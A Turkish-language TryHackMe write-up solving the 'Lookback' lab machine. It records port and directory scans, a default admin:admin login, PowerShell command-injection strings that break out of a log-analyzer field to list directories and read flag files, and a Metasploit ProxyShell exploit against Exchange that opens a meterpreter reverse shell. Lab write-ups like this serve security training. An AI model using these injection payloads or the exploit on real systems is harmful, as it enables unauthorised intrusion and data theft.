TryHackMe – Lookback Makine Çözümü

Table of Contents

Merhabalar, bu yazımda sizlere TryHackMe platformunda bulunan “Lookback” isimli makinenin çözümü anlatacağım. Keyifli Okumalar…

Çözüm

1 — Nmap aracını kullanarak makine üzerindeki açık portlar ve servisler hakkında detaylı bilgi ediniyorum.

[root:/home/alper/Desktop/TRYHACKME]# nmap -sS -sV 10.10.153.32
Starting Nmap 7.94 ( https://nmap.org ) at 2023-06-08 11:59 +03
Nmap scan report for 10.10.153.32
Host is up (0.066s latency).
Not shown: 997 filtered tcp ports (no-response)
PORT     STATE SERVICE       VERSION
80/tcp   open  http          Microsoft IIS httpd 10.0
443/tcp  open  ssl/https
3389/tcp open  ms-wbt-server Microsoft Terminal Services
Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows

2 — Dizin taraması yapıyorum.

[root:/home/alper/Desktop/TRYHACKME]# gobuster dir -k -u https://10.10.153.32 -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt –exclude-length 0
===============================================================
Gobuster v3.5
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url: https://10.10.153.32
[+] Method: GET
[+] Threads: 10
[+] Wordlist: /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt
[+] Negative Status codes: 404
[+] Exclude Length: 0
[+] User Agent: gobuster/3.5
[+] Timeout: 10s
===============================================================
2023/06/08 12:01:26 Starting gobuster in directory enumeration mode
===============================================================
/test (Status: 401) [Size: 1293]

3 — Test dizinine “admin:admin” bilgileri ile giriş yapıyorum. Sonra ilk bayrağımı elde ediyorum. Arama yerine “BitlockerActiveMonitoringLogs” yazdığımız zaman verilen logu analiz eden bir program olduğunu görüyorum. “BitlockerActiveMonitoringLogs’); dir #(‘“ yazarak filteri atlatarak mevcut dizindeki dosyaları görüntülüyorum.

# 

This interface should be removed on production!
*CENSORED*
**LOG ANALYZER**

Path: 

List generated at 8:45:25 AM.


    Directory: C:\windows\system32\inetsrv


Mode                LastWriteTime         Length Name                                                                  
----                -------------         ------ ----                                                                  
d-----        1/25/2023   1:35 PM                backup                                                                
d-----        1/25/2023  12:12 PM                Config                                                                
d-----        1/25/2023  12:12 PM                en                                                                    
d-----        1/25/2023   1:04 PM                en-US                                                                 
d-----         6/8/2023   1:45 AM                History                                                               
d-----        1/25/2023  12:44 PM                MetaBack                                                              
-a----        1/25/2023  12:44 PM         252928 abocomp.dll                                                           
-a----        1/25/2023  12:44 PM         324608 adsiis.dll                                                            
-a----        1/25/2023  12:12 PM         119808 appcmd.exe                                                            
-a----        9/15/2018  12:14 AM           3810 appcmd.xml                                                            
-a----        1/25/2023  12:12 PM         181760 AppHostNavigators.dll                                                 
-a----        1/25/2023  12:11 PM          80896 apphostsvc.dll                                                        
-a----        1/25/2023  12:12 PM         406016 appobj.dll

4 — Bu serviste Microsoft Exchange proxyshell uygulaması çalışıyor. Arama yerine “BitlockerActiveMonitoringLogs’); type C:\Users\dev\Desktop\user.txt #(‘ “ giriyorum. Böylece log dosyasından kaçıp ikinci bayrağımı da okuyabiliyorum.

List generated at 8:45:25 AM.
*CENSORED*

5 — Dizinler arasında gezinirken “dev” kullanıcısının masaüstünde “TODO.txt” adında bir dosya buluyorum. Bu dosyada çeşitli mail adresleri yazıyor.

## BitlockerActiveMonitoringLogs'); type C:\Users\dev\Desktop\TODO.txt #('

List generated at 8:45:25 AM.
Hey dev team,

This is the tasks list for the deadline:

Promote Server to Domain Controller [DONE]
Setup Microsoft Exchange [DONE]
Setup IIS [DONE]
Remove the log analyzer[TO BE DONE]
Add all the users from the infra department [TO BE DONE]
Install the Security Update for MS Exchange [TO BE DONE]
Setup LAPS [TO BE DONE]


When you are done with the tasks please send an email to:

joe@thm.local
carol@thm.local
and do not forget to put in CC the infra team!
*CENSORED*@thm.local

6 — msfconsole aracından “exploit/windows/http/exchange_proxyshell_rce” modülü kullanarak shell elde ediyorum. Administrator kullancısı ile ikinci bayrağı da elde ediyorum.

msf6 > use exploit/windows/http/exchange_proxyshell_rce
[*] Using configured payload windows/x64/meterpreter/reverse_tcp
msf6 exploit(windows/http/exchange_proxyshell_rce) > show options 
*
*
msf6 exploit(windows/http/exchange_proxyshell_rce) > set EMAIL *CENSORED*
*
msf6 exploit(windows/http/exchange_proxyshell_rce) > run
*
*
meterpreter > shell
c:\windows\system32\inetsrv>type C:\Users\Administrator\Documents\flag.txt
type C:\Users\Administrator\Documents\flag.txt
*CENSORED*